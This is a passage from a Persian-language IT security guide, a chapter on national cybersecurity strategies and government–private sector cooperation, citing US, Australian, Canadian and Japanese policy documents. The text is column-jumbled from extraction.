ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﻨﺪ ﻭ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ:
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﻣﺮﺩﻡ ﺁﮔﺎﻫﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ؛ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺭﺣﺎﻝ
ﺍﻳﺠﺎﺩ ﺳﺎﺧﺘﺎﺭ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ .۲ ﺭﺷﺪ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺁﻣﺎﺩﮔﻲ ﻻﺯﻡ ﺭﺍ ﺩﺍﺭﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﺑﻌﻀﻲ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ؛ ﻣـــﻮﺍﺭﺩ ﺧـــﺎﺹ ،ﭘﺎﺳـــﺦ ﺩﻭﻟـــﺖ ﻣﺮﻛـــﺰﻱ ﻣﻨﺎﺳـــﺒﺘﺮ ﻭ
ﻗﺎﺑﻞ ﻗﺒﻮﻝﺗﺮ ﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﻧﻈﺮ ﺩﺍﺧﻠﻲ ،ﺗـﺪﺍﻭﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ
ﺗﻬﻴﺔ ﻳﻚ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﻣﻠﻲ ﺑـﺎ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﺑـﺎ ﺑﺨـﺶ .۳
ﻧﻴﺎﺯﻣﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺳـﺎﻳﺒﺮ ﺧـﻮﺩ
ﺧﺼﻮﺻﻲ؛
ﺩﻭﻟﺖ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬـﺎ ﻭ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺗﻄﺒﻴﻖ ﻣﻘﺮﺭﺍﺕ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ .۴ ﺧﺪﻣﺎﺕ ﺿﺮﻭﺭﻱ ﺁﻥ ﺍﺳـﺖ .ﺍﺯ ﻧﻈـﺮ ﺧـﺎﺭﺟﻲ ،ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ
ﺍﺷﺘﺮﺍﻙ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻥ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺑﺎﻻﻱ ﺗﺒﺎﺩﻻﺕ ﻭ ﻣﻮﺍﻧـﻊ ﻗـﺎﻧﻮﻧﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻭﻗـﻮﻉ
ﭘﺎﺳﺨﮕﻮﻳﻲ. ﻣﺸﻜﻼﺕ ﺑﺰﺭﮒ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻣﻲﺷﻮﻧﺪ؛ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﻭﻟـﺖ
ﻓﺎﺯ ﺍﻭﻝ ،ﺍﺭﺯﻳﺎﺑﻲ ﻣﻔﺼﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔـﺎﻫﻲ ﺩﺭ ﻏﻴﺎﺏ ﻧﻴﺮﻭﻫﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ
ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﺳـﺘﺮﺍﻟﻴﺎ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﮔﺰﺍﺭﺷـﻲ ﺗﺤـﺖ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﺸﻜﻼﺕ ﺑـﻪ ﻏﻴﺮﻗﺎﺑـﻞ ﺍﻧﺘـﺸﺎﺭ ﺷـﺪﻥ ﻣﻨـﺎﺑﻊ
ﻋﻨــﻮﺍﻥ ﺯﻳﺮﺳــﺎﺧﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻠــﻲ ﺍﺳــﺘﺮﺍﻟﻴﺎ :ﺗﻬﺪﻳــﺪﻫﺎ ﻭ ﺣﻴﺎﺗﻲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣـﻲﺍﻧﺠﺎﻣـﺪ ،ﻧﻘـﺶ ﺩﻭﻟـﺖ ﺩﺭ
٢٨
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎ ٣١ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﻛﻪ ﺗﻮﺳـﻂ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﻩ ﺭﻓﻊ ﻣﺸﻜﻼﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ".
ﻫﻴــﺄﺕ ﻣــﺪﻳﺮﺓ ﺷــﺮﻛﺖ Defense Signalsﺗﻨﻈــﻴﻢ ﺷــﺪ ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭﺳـﻴﻌﺘﺮﻳﻦ ﻭ ﺑﻴـﺸﺘﺮﻳﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ
ﺧﻮﺍﻧﻨﺪﻩ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﺎﻧﺪ ﻛﻪ ﺟﺎﻣﻌﺔ ﺍﺳﺘﺮﺍﻟﻴﺎ ﻧﺴﺒﺖ ﺑﻪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺩﺍﺷـﺘﻪ ﻭ ﺩﺭ ﻋﻤﻠﻜـﺮﺩ
ﻧﻘﺎﺋﺺ ﻧﺴﺒﺘﹰﺎ ﺯﻳﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳـﺖ ﻭ ﻧﻴـﺰ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﻣﻄﺎﻟﺐ ﻭ ﻣﻮﺿـﻮﻋﺎﺕ
ﻫﻴﭻ ﺳﺎﺧﺘﺎﺭ ﺭﺳﻤﻲ ﻭ ﻣﺸﺨـﺼﻲ ﺑـﺮﺍﻱ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﺍﺟـﺮﺍﻱ ﻣﺸﺎﺑﻬﻲ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺟﺰﺋﻴـﺎﺕ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻭ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺟﻬـﺖ ﺣﻔـﻆ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـﻲ ﻭﺟـﻮﺩ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛـﺸﻮﺭ
ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ ،ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﻣــﺸﺎﺑﻪ ﺭﻭﺷــﻲ ﺍﺳــﺖ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﺷﻤﺎﺭﻩ ۱۷ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ. ۲۹ 28 The National Strategy to Secure Cyberspace
30 http://www.kantei.go.jp/foreign/it/network/ ][U.S.
priority-all/index.html http://www.whitehouse.gov/pcipb
31 Australia's National Information Infrastructure: http://www.dhs.gov/interweb/assetlibrary/Natio
Threats & Vulnerabilities nal_Cyberspace_Strategy.pdf
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٣٨
ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘــﻲ ﻣﺠــﻮﺯ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﻧﺪﺍﺭﺩ ٣٢.ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌـﻪ ﺭﻭﻱ ﺍﻳـﻦ
ﺧﺼﻮﺻﻲ ﺭﺍ ﻧﻤﻲ ﺩﺍﺩ ،ﺍﻣﺎ ﺩﺭ ﻋﻮﺽ ﺑﺮ ﺿﺮﻭﺭﺕ ﻭﺟﻮﺩ ﻫﻤﻜﺎﺭﻱ ﻣﻮﺿــﻮﻉ ﺩﺭ ﺳــﺎﻝ ۱۹۹۶ﻫﻴــﺄﺗﻲ ﺑــﻪ ﻧــﺎﻡ ﻣﺠﻤــﻊ ﺣﻤﺎﻳــﺖ ﺍﺯ
ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺗﺄﻛﻴـﺪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ٣٣ﻣﺘـﺸﻜﻞ ﺍﺯ ﺑﻌـﻀﻲ
ﺩﺍﺷﺖ .ﺳـﺎﻳﺮ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺭﻫﺒـﺮﻱ ﺩﺭ ﻗـﺴﻤﺖ "ﻓﺮﻣﺎﻧـﺪﻫﻲ ﻭ ﻣﻘﺎﻣﺎﺕ ﺣﻘﻴﻘﻲ ﻭ ﺣﻘﻮﻗﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ .ﺍﻳﻦ ﻣﺠﻤﻊ ﻓﺎﻗﺪ ﻫﺮﮔﻮﻧﻪ
ﺳﺎﺯﻣﺎﻥ" ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ. ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﻮﺩ ﻭ ﺳﺎﺧﺘﺎﺭ ﭘﺎﻳﺪﺍﺭ ﻭ ﺛﺎﺑﺘﻲ ﻧﺪﺍﺷـﺖ ،ﺑﻠﻜـﻪ
ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﮔــﺰﺍﺭﺵ ،ﻣـﺼﺎﺣﺒﻪ ﻭ ﺗﺤﻘﻴــﻖ ﻓـﺮﺍﻫﻢ ﻛــﺮﺩ ﻭ
ﻓﺎﺯ ﺳﻮﻡ ﺷﺎﻣﻞ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺍﺳـﺖ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺩﺭ ﺑـﺎﻻ
ﮔﺰﺍﺭﺷﻲ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛﻪ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ،ﻣﻘﺎﻣـﺎﺕ
ﺍﺷﺎﺭﻩ ﺷﺪ ،ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳـﻨﺪ
ﺣﻘﻮﻗﻲ ،ﺭﺳﺎﻧﻪﻫﺎﻱ ﺟﻤﻌﻲ ﻭ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ .ﺍﻳـﻦ ﻫﻴـﺄﺕ
ﻣﺠﺰﺍ ﻭ ﻳـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ ICTﺑﺎﺷـﺪ .ﻧﻜﺘـﺔ
ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﺭ ﺍﻛﺘﺒـﺮ ۱۹۹۷ﺍﺭﺍﺋـﻪ ﺩﺍﺩ ﻭ
ﻛﻠﻴﺪﻱ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﺧﻮﺍﺳﺘﺎﺭ ﻫﻤﻜﺎﺭﻱ ﺻﻤﻴﻤﺎﻧﻪﺗﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﺷﺪ.
ﺍﺳﺖ .ﺩﺭ ﮊﺍﭘﻦ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻛﻠـﻲ ICT
ﺍﺩﻏﺎﻡ ﻛـﺮﺩﻩ ،ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ "ﻣﺮﻛـﺰ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻓﺎﺯ ﺩﻭﻡ ،ﺍﻳﺠـﺎﺩ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺛﺎﺑـﺖ ﺩﺭ ﺑﺨـﺶ ﺍﺟﺮﺍﻳـﻲ ﺑـﺮﺍﻱ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ" ﺩﺭ ﻛﺎﺑﻴﻨـﻪ ﻭ "ﺷـﻮﺭﺍﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻓﻨـﺎﻭﺭﻱ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ" ﻛﻪ ﺍﺯ ﺑﻴﺴﺖ ﺻﺎﺣﺒﻨﻈﺮ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺑـﻮﺩ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻛﺎﻧﺎﺩﺍ ﺑﺪﻧﺒﺎﻝ ﺍﻧﺘﺸﺎﺭ ﻧﺘﺎﻳﺞ ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺗﻮﺳـﻂ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ
ﺭﺳﻴﺪ ،ﻭ ﺍﺻﺎﻟﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺗﺄﺳﻴﺲ ﺷﺪ ﻛﻪ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺩﻭﻟﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ،٣٤ﺩﻭﻟﺖ ﻳﻚ ﻣﺮﻛـﺰ ﻫﻤﻜـﺎﺭﻱ
٣٧
ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺗﺮﻛﻴﺐ ﻛﻨﺪ. ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺣﻔﺎﻇﺖ ﺍﻃﻼﻋـﺎﺕ ،ﺍﺭﺯﻳـﺎﺑﻲ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﺑﺮﺭﺳـﻲ
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺩﻓﺘﺮ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻳﻚ ﺳﻨﺪ ﻣﺠﺰﺍ ﺍﺳـﺖ ﻭ
ﺣﻴﺎﺗﻲ ﻭ ﺁﻣﺎﺩﮔﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩﺁﻭﺭﺩﻥ ﻳـﻚ
ﺗﻬﻴﺔ ﺁﻥ ﻣﺤﺼﻮﻝ ﻓﺮﺁﻳﻨﺪﻱ ﻃﻮﻻﻧﻲ ﺍﺯ ﺗﺒﺎﺩﻝﻧﻈﺮﻫﺎﻱ ﻋﻤـﻮﻣﻲ ٣٥
ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﺗﺄﺳﻴﺲ ﻛﺮﺩ.
ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﻣـﺪﻳﺮﻳﺖ ﺷـﺪﻩ
ﺍﺳﺖ .ﻧﮕﺎﺭﺵ ﺍﻭﻝ ﺍﺳﻨﺎﺩ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﻣﻨﺘـﺸﺮ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ،ﻛﻠﻴﻨﺘـﻮﻥ ﻭ ﺑـﻮﺵ ﺑـﺎ ﺗﺄﺳـﻴﺲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺷﺪ ،ﻧﺴﺨﻪ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪﺓ ﺁﻥ ﺩﺭ ﭘـﺎﺋﻴﺰ ﺳـﺎﻝ ،۲۰۰۲ﻭ ﻧﮕـﺎﺭﺵ ﺳﻴﺎﺳﺘﮕﺬﺍﺭ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ،ﭼﻨـﺪ ﮔـﺎﻡ ﻋﻤﻠـﻲ ﺑﺮﺩﺍﺷـﺘﻨﺪ .ﺩﺭ
ﺁﺧﺮ ﺁﻥ ﺩﺭ ﻓﻮﺭﻳﺔ ٣٨.۲۰۰۳ﺩﺭ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ ﻃﺮﺣﻬـﺎﻱ ﻃﺮﺣﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺎﻭﺭﻩﻫﺎﻱ ﺗﻔﺼﻴﻠﻲ ﺩﺭ ﺩﻭﻟﺖ ﻭ ﻣﻴﺎﻥ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺗﻬﻴﻪ ﺷﻮﺩ ٣٦.ﺍﻳﻦ ﺩﺳـﺘﻮﺭﺍﺕ ﺭﺋـﻴﺲﺟﻤﻬـﻮﺭ ،ﺑـﻪ
ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪ .ﺩﻩ ﻧﺸﺴﺖ ﻋﻤـﻮﻣﻲ ﻧﻴـﺰ
ﺩﺭ ﺷﻬﺮﻫﺎﻱ ﻣﻬﻢ ﺟﻬﺎﻥ ﺑﻤﻨﻈـﻮﺭ ﺟﻤـﻊﺁﻭﺭﻱ ﻧﻴﺮﻭﻫـﺎﻱ ﻣـﻮﺭﺩ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﻣﻌﺮﻓـﻲ ﺷـﺪﻩ ﺩﺭ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ۱۷ ۳۲
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
33 President's Critical Infrastructure Protection
Board
Council, October 8, 2001, 34 Critical Infrastructure Protection Task Force
http://fas.org/irp/offdocs/eo/eo-13228.htm 35 & Office of Critical Infrastructure Protection
E.O. 13231, Critical Infrastructure Protection ]Emergency Prepareness [Canada
in the Information Age, October 16, 2001, http://www.ocipep.gc.ca/critical/nciap/disc_e.a
http://ciao.gov/News/EOonCriticalInfrastructur sp
eProtection101601.html
37 e-Japan Security Policy Program, March 29,
ﻛﻠﻴﻨﺘﻮﻥ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ "ﺗﺼﻤﻴﻤﺎﺕ ﺭﺍﻫﺒـﺮﺩﻱ ﺭﺋـﻴﺲ ﺟﻤﻬـﻮﺭ" ) (PDDﻣﻨﺘـﺸﺮ ۳۶
2001, ﻛﺮﺩ:
http://www.kantei.go.jp/foreign/it/network/priori 63: Critical Infrastructure Protection, May 22,
ty-all/index.html 1998,
ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺁﻥ ﻋﺒﺎﺭﺗﺴﺖ ﺍﺯ ۳۹ http://www.fas.org/irp/offdocs/pdd-63.htm
The National Strategy to Secure Cyberspace: 62: Protection Against Unconventional
http://www.dhs.gov/interweb/assetlibrary/Natio Threats to the Homeland & Americans
nal_Cyberspace_Strategy.pdf. Overseas, May 22, 1998,
http://www.fas.org/irp/offdocs/pdd-62.htm
ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺎ ﻛﻤﻚ ﺍﺯ ﺳﻨﺪ ﺯﻳﺮ ﺗﻬﻴﻪ ﺷﺪ:
ﺑﻌﺪ ﺍﺯ ۱۱ﺳﭙﺘﺎﻣﺒﺮ ۲۰۰۱ﻧﻴﺰ ﺑﻮﺵ ﺩﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺍﺟﺮﺍﻳﻲ ﺍﻣﻀﺎ ﻛﺮﺩ
The National Strategy for Physical Protection
of Critical Infrastructures & Key Assets: ﻛﻪ ﻃﺒﻖ ﺁﻧﻬـﺎ ﻋﻤﻠﻴـﺎﺕ ﻣﺠـﺪﺩﹰﺍ ﻣﻜﺎﻧﻴـﺎﺑﻲ ﻣـﻲﺷـﺪ ﻭ ﻣﻮﺟﻮﺩﻳﺘﻬـﺎﻱ
http://www.dhs.gov/interweb/assetlibrary/Phys ﺟﺪﻳﺪﻱ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ
ical-Strategy.pdf.
ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪ:
ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺍﺟﺰﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺭﺍ ﺷﺮﺡ ﻣـﻲﺩﻫﻨـﺪ ﻭ
E.O. 13228, Establishing the Office of
ﺩﺭ ﺟﻮﻻﻱ ۲۰۰۲ﺗﻮﺳﻂ ﻛﺎﺥ ﺳﻔﻴﺪ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ. Homeland Security & the Homeland Security
٢٣٩ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺁﻣﺮﻳﻜﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺳﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺑﺮﭘﺎ ﮔﺸﺖ .ﺩﺭ ﺍﻳﻦ ﻧﺸـﺴﺘﻬﺎ
ﺷﺒﻜﻪﻫﺎ ﺗﺪﻭﻳﻦ ﻧﻤﻮﺩ ٤٦.ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﮔﺮﻭﻩ ﻫﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ -ﻣﺪﻧﻲ ،ﻫﻤﻜﺎﺭﺍﻥ ﺗﺠﺎﺭﻱ ،ﻭ ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ
) ٤٧(OECDﻧﻴﺰ ﺧـﻂﻣـﺸﻲﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﻳﻜﺪﻳﮕﺮ ﻣﺸﻮﺭﺕ ﻛﺮﺩﻧﺪ .ﺍﺯ ﺩﻳﮕﺮ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
٣٩
